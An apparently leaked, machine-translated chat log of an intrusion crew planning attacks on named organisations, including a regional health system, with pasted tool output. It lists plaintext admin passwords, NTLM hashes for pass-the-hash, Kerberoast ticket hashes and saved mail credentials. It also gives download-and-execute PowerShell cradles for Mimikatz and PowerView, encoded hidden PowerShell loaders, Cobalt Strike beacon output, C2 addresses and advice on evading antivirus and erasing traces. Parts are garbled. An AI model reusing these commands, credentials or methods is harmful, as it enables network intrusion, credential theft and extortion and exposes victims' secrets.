 5848 10672 conhost.exe x64 1 NT AUTHORITY\SYSTEM
 5936 6076 conhost.exe x64 1 NT AUTHORITY\SYSTEM
 6076 2916 cmd.exe x64 1 NT AUTHORITY\SYSTEM
 6108 10488 conhost.exe x64 1 NT AUTHORITY\SYSTEM
 7480 10060 conhost.exe x64 1 NT AUTHORITY\SYSTEM
 7720 6076 tasklist.exe x64 1 NT AUTHORITY\SYSTEM
 8988 10488 tasklist.exe x64 1 NT AUTHORITY\SYSTEM
 9108 5244 tasklist.exe x64 1 NT AUTHORITY\SYSTEM
 9620 5244 conhost.exe x64 1 NT AUTHORITY\SYSTEM
 10060 5800 cmd.exe x86 1 NT AUTHORITY\SYSTEM
 10488 2916 cmd.exe x64 1 NT AUTHORITY\SYSTEM
 10672 5800 cmd.exe x86 1 NT AUTHORITY\SYSTEM
 11156 11164 conhost.exe x64 1 NT AUTHORITY\SYSTEM
 11164 2916 cmd.exe x64 1 NT AUTHORITY\SYSTEM
 11228 11164 tasklist.exe x64 1 NT AUTHORITY\SYSTEM
he last time he visited this urral was on october 20th i don't think they're that worried that only one person + no, also blank forms, i'll try to see if he has a lustpass in chrome and no password? blauer also or did you only take chrome from them and no one else in the history? by the way about other italian people in this network only problem with nimbla is chic i still have 2 creds with access to it
    192.168.0.3 Waterway 11915Wnas2179!
``That's what you found,`` isn't it?
http://192.168.0.3:5000/ WW99NAS - Synology DiskStation
``From the premium pornhub I wish I'd gotten it in some kind of grid and the credits from steem, league of legends and meinkraft.
388 https:// www.dragonawaken.com 40
389 http:// www.9minecraft.net 100
``There's a different process to put? + he has 4 monitors there or what)`` clearly writes skul query and here lke = like`re ea lke c'[F5]`` it seems to me that he has a different layout or koba trojit?
SQLQuery4.sql - wwng-prod.database.windows.net.WWNG (wwng-admin (82))* - Microsoft SQL Server Management Studio
=======
re ea lke c'[F5]

SQLQuery3.sql - wwng-prod.database.windows.net.WWNG (wwng-admin (80))* - Microsoft SQL Server Management Studio
=======
 hee si[tab][control]

Waterway IT - Agent - Mozilla Firefox
=======
, h,.isom frmv. Plseley e no .cel

i [backspace]oul bsbe[backspace][backspace][backspace][backspace][backspace][backspace]s odpo e
``Turn off the juice of one of them, let it browse further while it's on the monitor```
Waterway IT - Agent - Mozilla Firefox
=======
Ry,
ee et ac tntkwif re shi el eed
``He's writing something in Tuvan there, I've only put the logbook there to help)[ ](https://mediaeveryone.com/group/waterway-com?msg=CReq7aL7Fw5fhS8Su) .))[ ](https://mediaeveryone.com/group/waterway-com?msg=av7QT8QTmaZMn6nwC) .no, the nimble address of the car itself?
setg Proxies socks4:209.222.97.8:5543
``and ip adr to log in sock from his tachka+password is the same? https://www.sendspace.com/file/dudf68не fully uploaded the archive that by the way was normal?yes i would be glad to fill me a normal archive) in the browser cleanly not to watch the control panel dkmen and watched vidosikon came at the most inopportune moment if that herehttp://www.howtogeek.com/679085/how-to-view-a-saved-password-in-firefox/ԁавы by rdp went? can not open the file as archive`tghiWERm4234A`
https://qaz.im/load/f3hhRs/zB3ahSсюда uploadqaz.im and encrypt the file names under the password here you will endlessly upload to a third-party resource increase the size of files + upload me a profile and by rd there check idletime did not work alright just make a backup of yours you need to delete your files and upload it in the current profile of your browser, then rndno i must have uploaded to the profiles folder downloaded profile no profile? there is a folder let's take the folder away then we can also take the folder away yes
====== IdleTime ======

  CurrentUser : WATERWAY\mharper
  Idletime : 07h:54m:42s:515ms (28482515 milliseconds)
``check his idletime and on rdp)`` why? I downloaded the folder with the profile ffrebut just rebooted? computer off? it looks like the computer rebooted from the network did not throw out? ping servers and all ready did not find the
total for hell 1726
160 servers
1550 armies
16 eksha,nasa,linpoka nothing,1 subnet only scanned vg have what? + on the backup server hangs the cloud service process, but on rdp under another user does not see any settings that backups go to the cloud - all other settings backups are visible. Maybe it's just service hanging, but they're not using it. As they are gone, you can check on the rdp
```
Veeam.Backup.CloudService 4676 Services 0 209,772 K VEEAM01\Administrator 0:03:16

``Backups - vm and filestores
```
10.1.20.183 VEEAM01.main.crispregional.org E:
															G:
192.168.9.124 ts1400backup.main.crispregional.org NAS admin\cr1spy173 format disk
10.1.0.22 CRHSBACKUP.main.crispregional.org D:DATAPART1
10.10.1.43 itunitynas.main.crispispregional.org NAS Bookmark \backup, access by YES
``macaffi server
```
https://it-admin:8443/core/ works by rdp (10.1.20.113)
Administrator
cr1spy173
``great) in the center
```
https://crhsvcenter7.main.crispregional.org/ui/

Administrator@main.crispregional.org
cr1spy173
``Domain Admins
```
th MAIN\Administrator e25c3e50d7638936c2f2ee77eebb1f24 cr1spy173
pth MAIN\Allscripts_Admin 19a1901a003621a6e1abd6edb0e7cf0b
pth MAIN\allscripts_services 19512cc1b7dc97e7e302f34a2245cabe
pth MAIN\AllscriptsSQL 6a8e1d103a88ea3dc2a012d34e544e99
pth MAIN\blove 7bef985313e414bb847c4dcd6c7c6826
pth MAIN\htservice 0cf803b54e919bc11e75c48ea596eb92
pth MAIN\meditech-admin d28f5c2d3ea915737812fbdeb4ea4c79
pth MAIN\meditech d28f5c2d3ea915737812fbdeb4ea4c79
pth MAIN\nodom 9255c608109b78b60fc048e84b7926aa
pth MAIN\rthomas 6f0b655dac0046d92eb3fec69ba6aece
pth MAIN\tcoppedge 06a1064c70fa0e250e81eddc4f046dacc
pth MAIN\amhs-admin 443abd60ece7cfb885a54fd2ba35ffcb
pth MAIN\dragon 6a8e1d103a88ea3dc2a012d34e544e99
pth MAIN/jwashburn1 fc98da86ebcc76100a0e62c22d0bd2ca
pth MAIN\pbodrey 300249ae0b204470a430295a2dc30a07
pth MAIN\smaxwell 87a628063ebb1e790221800f8ed76d16
pth MAIN\ashleys 4f3d00492c0d5219ba173c26fc1694ef
pth MAIN\MBAM-RW-SVC 04a88994cf7db5a0e8730e4effd73742
pth MAIN\mhiers 3b3000484afdc685a779399548e76d9e
pth MAIN\rlagrone 438eb0f2356b0f16719a307919e583c6
pth MAIN\spf_svcs e25c3e50d7638936c2f2ee77eebb1f24
pth MAIN\helpdesk 0219040d969969400d4253ff874683fd9f8
``C:\projects\default\temp
BBCTX6 @ MAPCIASP\bbbwalkerj
 @sleep don't forget to kill the sessionKerb removal, sent T2snap don't forget to clean files@help @sleep all native commands go through @link to the module for the nativity and the desired yousejHow to write? Describe how it should work? I will create a request to add in the personal where to write? and do not load modules from the guitar write more simply that I would like to add as nativman on tpsh is unlikely to be at the topI have no white background) blackZmek there you will see a boxPAYLOAD Writes on the top left in white on a white background a bug interface it is Need a man on this TPS and the ability to create the load in tpsh threw the session immediately progress went what the day did` ``


TicketByteHexStream :
Hash : $krb5tgs$23$*Administrator$mapciasp.com$MSSQLSvc/ASPSIM1
                       .mapciasp.com*$E6D520476D906211380CC186A408408A$477E6AD1
                       027370F111C08A4F9D31A485DFB34A2E0CDE1C1E35C0AD0A397F5411
                       77B986A5AB111E4AE415B2A24216698CF96182258B4AE04326E780A3
                       72B1E0F654BDAECA95910323DA4EBC9DA3336CE912261C1B0FD819FC
                       F74B533EC0CA4447898247A30CCA9C524C8F36E5D7303D14EFAA0586
                       3254A757DED5838BAB90C18C7E6CF3AFC2108EA302D77002C66EFBE4
                       2EFA329788900F51F341A6AF5F2E7091316C7110264B78F3EE9615EF
                       7471CA782782727064EDD406C0D72AADA04E58548A4178AF93B734FB
                       950FECA0227BB34B7C9B33DA0416A0BE8628211769BB93AF23B4DB5A
                       72373C273633D31CAC0ACB5F1523B613371B323ACC54D379E7427260
                       A9632A9AFCBFB76AD92DE49E74AE080071455E4FA7981C878A5A20F8
                       1099EBFEEA4DCC48FC4D6D9DF7ED5324956DA34C84EFB8D3604C3F1B
                       BC255D033071CF6FF7971FFAAA716D7CFC27987C005E2FC95A139C81
                       C1B4EBBDE8E387B43D6678478EA9821DA4A3865854C73723227F4ED2
                       6C7E78B6B8D2018F7C450D3369DA404ED7DA204714B8D756C2F035FA
                       98554E28CE6E00ADEE069CC881B6EB233E1F2F4C59A369685E9FBAE2
                       B80CAAB77664628DA70C70EAA0CC91DC837B8C97B208B1141F7E2ED8
                       8602C53E8E49938CECCF88D45510906F5683DD3DF368063A30CCFA19
                       2F78D133D699B3CCDA149F2BEF8D80D6BF88DA1340D5F31546A95DA9
                       B60AAA2C2717F8DB443111651A94522D2F6DFA12D2C4DA7E990EDA84
                       EDBB8444528CF879DE065E1FA84D9BA1683E284E464197B1B227F02B
                       66E0BA9FD900A5D638F106BA8F614E277581110579EAA06AAFE60127
                       0D542CE4D35660B9EEFD4022D442C1DA40EB47ABCF1EB8B9D262161D
                       E6A1830EB3CE6ABF5C0370ACA46CAF89C4D33B0684B3E7031458CDD6
                       BEE84722E8CAF716C758EBE6268B2D2D3DD7D918A19E88DF8E6F817C
                       BE5AEBDEC12A466FF61114E10FDF24D8B00E7F8AFBB06078B1FFBAEF
                       6106D73EFC1837BC7A2ABC3F3471A9D01B519249618A7ADB9AEB9769
                       D1546EAE78A06781D5B966438851EBD25E9C2D5A4E4ED27951089B67
                       A5A993EB6C6A8F5C3F14D69A88674F2E1A8D105F8CB88A31A244216D
                       EDAA7DC6785B2AD012E34BE49EA8D6A8A272EDFDA4BFC7959E5FF88E
                       6248913FBB10C2AAAE11BE6AA549215A5DAB25E85D215DE3873BA51E
                       B0088846C4D467C514788D6D1A51A71937C04189F52978114B8B9146
                       EC0E2833E85E586181F292E0FEABDE42C9C27785800A49531E45313B
                       AC2DD1BB832C97E48663D151E0907C880BD0370E31E89C469C7C156F
                       02C764B84A5A7D2C82236426787689554602A9829D9BFF087B6E9218
                       14E1D3BBA77181A6525B2448E209777518EC5299168D6ED6A2A0E277
                       F5303F213008B834550A11188B889EED75D5C527E11764F6AFC6A80C
                       DD35D1344BAD3448689F46EB4F05DCDBCE5506C66B5A18EF28785D28
                       0BD2A2B0D4C79D6EEF3B59C759B3639BCE6AE94FE3B79BFA5F809029
                       EDC96318B6AC8AB73A950839E1447A6F5FB74F415C419B1B46DE1A37
                       769C6D1A68CF52F297906F2CCD7916BA95E0A7833534860A7A5C2177
                       22628FB126F7857C7FFCE66DC3A568EC9EDCE245D5D7C591F3867A36
                       080DB0248E6AE2FD1BDE8D4C91DFE21105C925AEFAB72128269CC10E
                       6FABD90380
SamAccountName : Administrator
DistinguishedName : CN=Administrator,CN=Users,DC=mapciasp,DC=com
ServicePrincipalName : MSSQLSvc/ASPSIM1.mapciasp.com

TicketByteHexStream :
Hash : $krb5tgs$23$*sccmservice$mapciasp.com$MSSQLSvc/ASPSQL02.
                       mapciasp.com*$602430A17C9A29DAC8460019FEC6DF34$6BF0FC887
                       628A0937D628447D19956873A219C2ADBAB932D9E66C922DEC7687B8
                       4ABE8148EDFC7280F311560DAEB54432195E0F82EADC326FFDF75D99
                       B135C62EEB85BDBF97D71B2621E04E58F6725779024977914AB87B64
                       D11546BA1CBBC5B572A72549DDFBB498A16C9E12C4D5EE5080FE4073
                       AE6793FF6712FA00646B2E9C768485F3657810FA466BAED06B96CA34
                       22C1B5B3B889A286A87B4F421998424527F2EC7D47D44B7B92C30517
                       4A9EC5AC78665E8F6E00E5C662B651C7E7BCAC36800431B057E6F040
                       19D4D11F2DA190D8B3B499B9B59980B10C608142C52234C5A22F0ACC
                       99F6885E061CCB84B37FFDE988A61D3A4D57A37E453C0D0C088FB018
                       C6609E9EB56AAC276AF13E3756EE4D08459774DF8B3F5BB0B88FE7F0
                       95170DF8BB8E7BAD2FBD0BF80A9A2D955122A1347D3463173272D26D
                       9A73FA9D936B9022F21556CA3F4003444E14C6AABC2934D824308536
                       3EFD5D6747E0F35D216937761B1EAD321492D8334A36EFED08E0CC3F
                       91DAB8269EAA4B8F06E45CAD95982E247B6AA5169EA3F4EECC779C7C
                       32C347E6396C89D830A77119826C9B5B039910A6F8C07C36C477E99C
                       CB2DC1175194598FB29565654B9A3B6E455A3448950D32B0972C2BAE
                       AAABC5CB82DC4BC47BA272CD57D2C002DC6B123D24285BED35092A6E
                       14BF7CD42BA66FFEA1C0AF120C555F2101C7B962B0562BFF71FC9317
                       15B2EE403D5A36F76289D2FBC283C41BA387D13AA7535F4BD48B8F4F
                       E81FE4331F1A43DAED8DD67A8B990219C068EC9449473C36739F2773
                       41D1D118EE57AF8E1824B089CFC78F5CD22FD3E78923965AF0B21768
                       DDE4CB821E40C6AD00184710C4F0AA0807C2A703968BED888A427791
                       3395DA98F7084F53A2DBC07BD85C1863649ED5BC308B8429D1BCEFE3
                       062C5BFC5D5537192FA7D73F4ECADBF306AD55F0AE2305C3A19F4D06
                       62038B7BAA87772614817D1B271391680AF64155C952D1565B826554
                       E67C452544B3EFD95A2BBBF74F2E5BBDCD5FD8420BCB3A8E9146CD60
                       7223752AF2309C2DDDC2AEE6771C9D1CA1945E54F5747DEC939154D5
                       49A80AF35543E72BF8FED7E29E3C43B9241CC402C08C3D3AF10EA2BE
                       53DC0AD884D67B1D9201F45899A9C7AF169E99BB6038A7FE96F79CA8
                       AEC36DC2C7ED30DF500DB99E26466B2EEE540125CB9F7770439687B9
                       64020E0B0B3A865BDC7AF938AA137A88D15BFFA372318A73ACBEF568
                       9DD10A4A4AC31231C31A22AD5365FD27A9ADEA22B0982415AAE53773
                       1DCC7576EBC1564DFB45821F3A98457899BE4C3C15964C31F9B95703
                       EE81CF3186A4C815ACE960650371823A0A4F227C955F5BE0250C459E
                       7C9577F855E7CA200CCE38B2087333825635E727EFD97B915D7BBE1F
                       8E34753EA955F8C128DF362C831C115433CFD064C35F4DD35918100C
                       2D7431D040D23C4A9E4E66BC7AF58CA9AAEB658B7A7E334A30B527B8
                       D05A6812847831467111BD0D0E32BCE4F349F4D893F4001BC5CD1596
                       49E95D33396DF5AC02A9C0DFC29DFB33EAD471289EE5E59730BC1C57
                       5E0A6F3066B6E967039EA21EA545428A6566FEBE73657915EA740C02
                       91BA145DD3059FF043B1B6880F629D11C91DB0E596BD56069BA4E323
                       78905550C6A7A0507A3269634FC8D41854B02025B6A9185E922C4D83
                       A23105581
SamAccountName : sccmservice
DistinguishedName : CN=sccmservice,OU=Service Accounts,DC=mapciasp,DC=com
ServicePrincipalName : MSSQLSvc/ASPSQL02.mapciasp.com

TicketByteHexStream :
Hash : $krb5tgs$23$*aspsql2svc$mapciasp.com$MSSQLSvc/ASPSQL2.ma
                       pciasp.com:1433*$7FBB03B44CB498CEA3660DC0F17F4326$CEB193
                       BE15A7B0299BEBE7BAB2A50A7A53EA924FC555D8111667F9AB4DE458
                       B220F36F08A7E3B1965BBCA55CF7F09F1EF255AD630BAC1580000E3A
                       D222A320D342DB4BC833E2E4C257E52553197BD338DEFB57B236C9E6
                       192090C832A419E665B511163E0BAFAA90690232DDE95A5650F6A6B8
                       FD5C78FD5E49EC4879816F7441971213D2861AD7E20412C549CC8517
                       677D53552B83756A2F54BAEB38497F60E8D7EB60B9D7A19BFF495016
                       06FDDE848E2DA8B8A128BAB34C77FFF5AEA18D130C6C2818877EF059
                       FB0009A8DAFE7C03028C02DDDE72672BB4E09BFBD6F6B91AFF72C0E4
                       5203A12307CE38D4CFAAF48CC5B1D000E68C11BEA41766B207657EE1
                       5BF5115CAEE8B5F42AC242857F921DC68963365579AB5245A9A261D2
                       EB551E5E8FEA013839D1AA991483C2EF6FE3117974AAD6D6E6E358D4
                       A3AF20F6760C5AA13A6BAE5CA8DFA9E2941744D664212581A6206695
                       AC7D817F4F6A0114E5FC5CDF87BB5F3887C24DC31A71EBC0BF75C668
                       E6BC1F422AC0E38D06570948272E87E7D532BB690EE6F62287866ABE
                       D4B45B094F37AD2256A971BDE09F18628D8E700FE5FA66402B0F656B
                       03FFBCE97D66E7035A7704A341E05B78F627CA42BC06C0154B403388
                       9E7475B1B10D442A54F9F95E3AE67260DE4FAB6226B210FC0CA67DA8
                       785B42B01F1D84BAC9CA7860DFBAD717E7C91B6A2FF53CA7AFCDA035
                       3EA35435695B3A98C5069BCE59BB83F2CFEEB3AB2C8A094D3DAF595B
                       DC8D4E347736B6B635B2B73EA4F10655F3FA44FEE38B78B2F42BB2FC
                       E531C0C66634D142CDC6C4C806733AF8CC250DE2234C9D7258901857
                       49502387C090BE6CB3AACE649D3D9274A7EF3838E876DDAC9563A29B
                       8E41E0EB541FE0306E999AA669293B6EDE8CC708EBD73060F093490A
                       C226A3F55C79E2376EE53B1053544A20F977EBC9A9296276B52905BE
                       0B63371C951FFDF6A65D297EBBFF81902B8F2DA42675A36C45F11C22
                       B141782F7512AD8363C23BFF25E4EF91D69386F39E1F630795B3FFA5
                       C93758C3503AC41EE6F89ACA8A60A8F3F208DE85DD24825BEEF1C13B
                       17D17C6C33B73A2787BCE9D4A79CCFF3AACD9516EA2ECF88853555D6
                       62E46125B0CE00B2EDF5E0D24C18D5DADDA81973EB4ED03FAB5BD2B6
                       C9F9D06BD5CB5B97EABF2689AC617031E51035D7FC6D33417CCA79A5
                       BF405F8063EDFD057F63554133F5E507992D982CDA68B08BD7C6B923
                       31ACCEF2AE62F47BD978E62178C95D2791D458686E171F1B3DEF886A
                       CCC76ECE68757CFED83296882DE9819A7D0DC6460E6E797DEF03CCD8
                       137E0B7DAF02F42FE1C14B0C60E86048961D658AEAF2E6740887981C
                       193082C4457CEAB32102095245195C2F9848883CDE9AF1BEAC622FDC
                       7590C0E255935455514560BE4ABB64F073754891F3F6D646B3CC1FB7
                       F6307A48BA84B7B91944190C0D8BA963AB91ABF9F52EB5ECE6101FF7
                       9934DC488320CE690433C4661431B0134C0B05511D7BF19EBFA4AD92
                       BA15E3871E7F32D8177612D05A1FB6F9917629B21B13CC009A073259
                       88E2526171CF5ECE69974CCEEE9B2D63932F9A85A1974A90A840C91F
                       14AEFF37F45A82E5F1A66276B0220977F73B445DEB06F63F458A80BC
                       4CF09C2E372D15E0141AD31F0910FCE19C7DD5003EE475ACD92A6DCB
                       0383DE61A278
SamAccountName : aspsql2svc
DistinguishedName : CN=aspsql2svc,OU=Service Accounts,DC=mapciasp,DC=com
ServicePrincipalName : MSSQLSvc/ASPSQL2.mapciasp.com:1433




``)))pay attention yes yes without comparisons you can see and compare the payoffsvote both linksix ((New-Object System.Net.WebClient).DownloadString('https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1'));``
iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/darkoperator/Veil-PowerView/master/PowerView/functions/Invoke-ShareFinder.ps1'));
``This is the script from the git
https://github.com/darkoperator/Veil-PowerView/blob/master/PowerView/functions/Invoke-ShareFinder.ps1
As a consequence in the current session you write Invoke - something you've downloaded and bang it works[ ](https://mediaeveryone.com/group/mapciasp-com?msg=NvfCtE6foxs9WBEAY) here's the url of the script command above - just load it into memory without physic drop `` ``.
C:\projects\default\temp
BBCTX6 @ MAPCIASP\bbbwalkerj
 EULA.ps1
The term 'EULA.ps1' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.

 00:00.0058


``Running scripts by filename? ExactlyNo one)``And who says it's issued once an hour?
powershell.exe -nop -w hidden -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB3AGkAZABlAGkAbwAuAGMAbwBtAC8AYQBzAHMAZQB0AHMALwBjAHMAcwAvAGIAbwBvAHQAcwB0AHIAYQBwAC4AbQBpAG4ALgBjAHMAcwA/AHYAaQBkAD0AawBKAGYAWAB0AHYATwBsAGIAdAA5AHIAVAAzAFYAWQBqAGUANwBBADQATQBxAHUAaABiAEcAOQByAGIAbgBjAHIAQQB4AHoARQAzAGMAdQAnACkAKQA7AA==
``You said you couldn't load the same load twice so restart the script in the current session for 40 minutes``.
iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/'));
``Workingwhenyou're ready.
powershell.exe -nop -w hidden -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB3AGkAZABlAGkAbwAuAGMAbwBtAC8AYQBzAHMAZQB0AHMALwBjAHMAcwAvAGIAbwBvAHQAcwB0AHIAYQBwAC4AbQBpAG4ALgBjAHMAcwA/AHYAaQBkAD0AMwBrAGUANQBhAHgAWABFAGUAdQBLADkASQBtAFYAMQBCADMAYgBwAHcAQwBRAGoAYQBCAEMAYwBoAG8ARQBPAG8AdwBUAGEAWABHAGQAbwAnACkAKQA7AA==
``1 load 2 times you can't throw the load unique? check the session in tpshAnd you can't import it as a module eitherGood question, I don't know. But you can't use Invoke-Kerberoast.ps1 because ps1 is closed. So if there is no scripting on your machine and there are no modules in ps then how will it work if I import kerberos into ps?this is how tpsh takes the scripts load in itself.Did you try running the scripts closedcrystall? any other ideas? did you try to pull this https://wideio.com/USA/6LG8Ean3mNZcWV4Zk4E8A01XYmw2NOfxva5pgZVUWcjnAvyD60q45b991yG0/dashboard@tl1 into tpsh ? i have access via ps and cmdkxxm
I can't believe avg and defender is so evil...even injecting it into a delta process won't work..Trying different loads, session will go to the armitage and then will fall off. No seftikatz, rubius or kerbiroz type stuff to load, tears it down right away. Run ps scripts locked. for me textmodify files for themselves net localgroup "Admin" ``.
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
MAPCIASP\Domain Admins
The command completed successfully.

``output with /dom``.
The request will be processed at a domain controller for domain mapciasp.com.

Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
aspprinters
bbrooks
bkupagnt
Domain Admins
Enterprise Admins
ghouser
mkline
rmiller
sfoster
The command completed successfully.

``If I pull files from each conf 10-20 lines I will die in the number of files on the systemTo be able to search if necessary, and not fuck with the page loading in this chat.Why files about DA EA LA in ad_user 829 Objects go to 1000 users? in #general also wrote how to search historyThere is no, search for the drive file is not, check and if there your traces - clean up`` ``
History File Information. The default location for this file is $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt .
``Do you know that ps stores the history file on the system? On your own dedicec yes, it's connected via citrixts on the rdp?
																  Target : MS.Outlook:bwalkerjr@birniebus.com:PUT
																  Comment : USERNAME_TARGET_POINTER
																  UserName : bwalkerjr@birniebus.com
																  Password : @@CuAAAiBwdAEGAsBwaAUGAyBgaAIHAABgYAkGAyBgbAkGAlBgYAUHAzBgLAMGAvBQbAA
																  CredentialType : Generic
																  PersistenceType : Enterprise
																  LastWriteTime : 3/2/2020 8:58:29 AM
																  
																  Target : mail.krapfbus.com
																  UserName : bwalkerjr@birniebus.com
																  Password :
																  CredentialType : DomainPassword
																  PersistenceType : Enterprise
																  LastWriteTime : 3/2/2020 8:58:29 AM
																  
																  Target : bwalkerjr@birniebus.com
																  UserName : bwalkerjr@birniebus.com
																  Password :
																  CredentialType : DomainPassword
																  PersistenceType : Enterprise
																  LastWriteTime : 3/2/2020 8:58:29 AM
``Mb external domain birniebus.com where are they? Via cmd and psa how do you work there? Trying to get, seabelt and data on YES I know that @user9 has yes I asked how many with YES networks not up@user3 have you with YES network?[ ](https://mediaeveryone.com/channel/general?msg=idsBNFAZrjwCKbFNG) I said no doubt about itI can't tell without a doubtI have 1 YES real network 1 network.and tell me how many networks we got with YES which without a doubt are normal networksI'm working faster colleague I'm working 3 more people +++ no more new sessions so all worked out what was it?or not .... bullshit what's it going to be like labavo no login, it looks like there's no freebies there + mostly 7/hrs don't like it i don't@user9 ?no trusts you say ? do make a confrashash.com - make a confrash plzstateoilcompany.com - strange network
34 users, 66 computers, no trusts can i getstateoilcompany.com ?I'm not sure if I've got a new one, but I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one, I've got a new one.com I'm still the only one who works with it? ballymoregroup.com confab check it out guys there is a session with a local admin zazl not touching it priorityes it but I took ballymoregroup so what to take, zazl or ballymoregroup? ballymoregroup take it to work
there's a big case
can be for two at a timeadinfo taken off still get a taxi? well, i did not believe it) ``
>mail: tyler@gaudyme.com

``Ah ouch''.
>userPrincipalName: destineeg@DressinGaudy.local
``I don't believe it,`` in the adinfo suchDressinGaudy.losale more +3 sessions and configs too from that domain have 3 cars
2 has a client, but configs on them do not see and they are now dead
on the last client does not sit sitbelt is silent? config and does not smell of it in bluegrays alive there is a computer without a client vpnapodlecu who took rtpcompany.com there is a second session you do not write in the comment your domain koba, there is written externalnikBK new bots 15pcs[ ](https://mediaeveryone.com/channel/general?msg=MgtwStYbXqTWFDJkj) do confuber work take whoever.com10 minbrbr newbots are in bkHowever sexy all off that you can kidajeet still sessionsfrom him on the tachka look for vpno is bluegracegroup.comadinfo no as not visible domain[ ](https://mediaeveryone.com/channel/general?msg=oQMWyvPFBzY3xipch) hurry up))com`brighthorizons.com` confi pleaseDo spav https://neteric.com not come[ ](https://mediaeveryone.com/channel/general?msg=FfcCPvXueqb75SfzY) you'll laugh, but in adinfo no external domain if you pick up then writekobel.com - confi already forgot how to do it? domainvneshneed to give confi TomHolzerFord.local[ ](https://mediaeveryone.com/channel/general?msg=ET5DAcd6gWFrqMsfh) take awaykobel.com take away here in the netcob and work[ ](https://mediaeveryone.com/channel/general?msg=Kw5w8z6gz9EsRLCTt) here sessionsAnd work with what? mine by the way, flew in, although before did not want to. they clean daona empty the rest in the shit after closing the gridthere are only 2 so far clean not personal took74.118.138.118
https://neteric.com
----------------------------------------------------------------------------------------
104.243.44.69:13574
Cqr7797e1iSJyzFwnyTPoECVpWqqOSUGUZ7
pf,hfk``
74.118.138.118
https://neteric.com
----------------------------------------------------------------------------------------
104.243.44.69:13574
Cqr7797e1iSJyzFwnyTPoECVpWqqOSUGUZ7
``````
104.237.4.48
https://valcp.com
----------------------------------------------------------------------------------------
199.127.61.214:33914
WLzR0eDj5HH5PGAwCkOn9Dv2byQT64cQ3GY
``Divide into groups by the way a couple of cubes workers are red, so where there was already spawn do not touch`` ``
199.127.61.123:15724
npUPwGS5AK1pPU6W6ZxmvzzkdhsqzqaRFWa
``Get the cobb up? oh, what a good time to fix it, you know you have to take it before they fall off if you already have a session in the cobb da fuck with this microtic, will soon be ready to do what?general alg you already know) Okay, but I want the map to reflect the nuances of the situaDa rdp came and raschal Well I can describe here is how it was today So there's a situation review later or how to be with non-attractable servers How to be on the server without charThere are now busy problem with the internet and here is the motive for the question just so you do not get mixed up in the algorithmto leave all if it helps youI am an artist I see so This is my vision a, even so the right algorithm on the left tips How to start Well, the beginning of this turn in a token can take the command outside the map true, to reduce the size you're still at hand bats and so dto leave it if you understand and 1 line is a turn in the token) the beginning of the map turn in a tokena little strange you got a ok if offsets av and stuff like that why? faster would be to scatter ephemera I think the same way from 100 mapping in both cases and if you have not found it, then only mapom if 100 then it is better to otkl av + win def and scatter ephemera if to 100 servers you can get along just the same only mapovoreally here an important aspect of this?so will dozabyla forgot i do not see the division to 100 servers and from 100chem to change? report as a router will beroadmap, waiting for a routerpodobytesya what to do so i will add you a new tul `https://ws4nrdkwmjbxrv56pn4knxaex6ttwnjbdrshd6gfq2hw324ugwlgwfad.onion`
please send me your names from here.
23.19.227.54
https://urlbig.com
----------------------------------------------------------------------------------------
45.126.210.66:22514
cJZw4bgWNBuYAeLXToHzNLYZOqnTS8CJwIe
``Well, I don't remember the hostname and I can't get into the koba yet.``
now throw the kobu in the history of bicon no unions do not see ``
beacon> shell net use
[*] Tasked beacon to run: net use
[+] host called home, sent: 38 bytes
[+] received output:
New connections will be remembered.


Status Local Remote Network

-------------------------------------------------------------------------------
Unavailable G:        \10.10.34.201\c$ Microsoft Windows Network
Unavailable H:        \10.10.34.242\c$ Microsoft Windows Network
Unavailable I:        \10.10.220.95\c$ Microsoft Windows Network
Unavailable J:        \10.10.220.67\c$ Microsoft Windows Network
Unavailable K:        \10.5.68.232\c$ Microsoft Windows Network
Unavailable L:        \10.91.18.5\c$ Microsoft Windows Network
Unavailable M:        \192.168.0.59\c$ Microsoft Windows Network
Unavailable N:        \10.91.18.21\c$ Microsoft Windows Network
Unavailable O: \10.10.30.64\c$ Microsoft Windows Network
Unavailable P:        \10.10.35.60\c$ Microsoft Windows Network
Unavailable Q:        \10.10.34.222\c$ Microsoft Windows Network
Unavailable R:        \10.10.39.180\c$ Microsoft Windows Network
Unavailable S:        \192.168.254.156\c$ Microsoft Windows Network
Unavailable T:        \10.91.18.76\c$ Microsoft Windows Network
Unavailable U:        \192.168.0.86\c$ Microsoft Windows Network
Unavailable V:        \10.10.72.247\c$ Microsoft Windows Network
Unavailable W:        \10.10.35.101\c$ Microsoft Windows Network
Unavailable X:        \10.10.35.85\c$ Microsoft Windows Network
Unavailable Y:        \10.10.73.9\c$ Microsoft Windows Network
Unavailable Z:        \10.10.72.139\c$ Microsoft Windows Network
The command completed successfully.

´you gave the cob above I thought it was she and isto me to compare it nowhere else exactly where you mapped to dumping) ah, so you need to throw the coba, so immediately would have said)) and check whether the maps remained after I wanted to see the place where you pamiely before dumping.she and I was interested)in the coba no net or no in the coba?
because I may have it in the one that fell off mapiltekonnect only in myteb no at allTESTCONNECT.lrhc.losal or here do not remember exactly, but here like mapil
TESTWEB.lrhc.losal to check if they are still there I am interested in the host where you mapped from the list
```
10.91.19.195
10.10.31.42
10.10.39.148
10.10.35.118
10.10.220.202
10.10.35.19
10.10.80.102
10.10.220.88
10.10.222.38
10.91.18.34
10.10.34.187
10.10.34.183
10.10.30.154
10.5.68.126
10.10.222.61
10.91.18.94
